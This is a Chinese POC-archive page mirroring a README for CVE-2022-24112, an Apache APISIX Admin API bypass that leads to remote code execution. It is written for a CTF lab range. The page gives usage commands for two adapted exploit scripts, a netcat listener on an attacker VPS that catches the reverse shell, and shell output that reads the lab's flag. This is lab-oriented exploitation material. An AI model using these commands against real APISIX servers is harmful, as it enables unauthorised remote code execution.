支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 5c8db77eb83916c8fbccceff052fcf95700c3d9c

来源
关联漏洞
标题:Apache APISIX 安全漏洞 (CVE-2022-24112)
Description:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX 中存在安全漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin Api的限制。 以下产品及版本受到影响:Apache APISIX 2.10.4 之前版本、Apache APISIX 2.12.1 之前
Description
CVE-2022-24112_POC
介绍
# POC
收集的POC
## CVE-2022-24112

为了做春秋云境:CVE-2022-24112靶场环境,修改了两个POC,将[M4xSec](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py)与[twseptian](https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py)两位师傅的POC稍作修改,适应春秋云境靶场:

---
**春秋云境:CVE-2022-24112:**

Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。

---
原POC:

1、M4xSec:https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py

2、twseptian:https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

修改后的POC为我上面写的两个,分别针对Linux和Windows使用环境:

---

**CVE-2022-24112_Linux_by_twseptian.py**

1. VPS开启监听:`nc -lvvp 18888`
2. 进入POC目录运行:
   
   **注意**:此处添加-t的数据时,不需要写入`http://`或`https://`,只需要域名+端口即可,如下
   ```
   python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
   ```
3. 返回查看VPS情况如下
   ```
   [root@root ~]# nc -lvvp 18888
   Ncat: Version 7.50 ( https://nmap.org/ncat )
   Ncat: Listening on :::18888
   Ncat: Listening on 0.0.0.0:18888
   Ncat: Connection from x.x.x.x.
   Ncat: Connection from x.x.x.x:x.
   id
   uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
   cat /flag
   flag{0834f79f-5f40-4389-bce7-c64e969734c4}
   ```

---

**CVE-2022-24112_Windows_by_M4xSec.py**

1. VPS开启监听:`nc -lvvp 18888`
2. 进入POC目录运行:
   
   **注意**:此处添加-t的数据时,不需要写入`http://`或`https://`,只需要域名+端口即可,如下
   ```
   python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
   ```
3. 返回查看VPS情况如下
   ```
   [root@root ~]# nc -lvvp 18888
   Ncat: Version 7.50 ( https://nmap.org/ncat )
   Ncat: Listening on :::18888
   Ncat: Listening on 0.0.0.0:18888
   Ncat: Connection from x.x.x.x.
   Ncat: Connection from x.x.x.x:x.
   id
   uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
   cat /flag
   flag{0834f79f-5f40-4389-bce7-c64e969734c4}
   ```
文件快照

[4.0K] /data/pocs/5c8db77eb83916c8fbccceff052fcf95700c3d9c ├── [2.9K] CVE-2022-24112_Linux_by_twseptian.py ├── [2.9K] CVE-2022-24112_Windows_by_M4xSec.py └── [2.6K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。